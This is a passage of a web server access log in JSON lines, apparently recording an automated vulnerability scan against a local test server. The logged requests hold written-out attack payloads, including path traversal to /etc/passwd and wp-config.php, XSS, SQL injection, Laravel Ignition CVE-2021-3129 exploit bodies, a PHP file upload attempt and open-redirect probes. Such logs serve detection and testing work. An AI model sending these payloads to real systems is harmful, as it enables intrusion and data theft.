AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.094","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfmc/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.096","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.096","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.096","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=/etc/issue HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.254","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/getuser?index=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.235","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_something_.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/51 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.232","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cgoogle.com/evil.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws/v1/cluster/apps/new-application HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/sls/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22phar://../storage/logs/laravel.log/test.txt\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.069","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/52 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.994","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/api.php?mobile/webNasIPS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"TNAS", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.222","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aworkreap_award_temp_file_uploader\x0D\x0A-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22award_img\x22; filename=\x22297MbDg1RCqEvWuhlp0md6lYdl0.php\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------cd0dc6bdc00b1cf9--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/user/picker?query= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 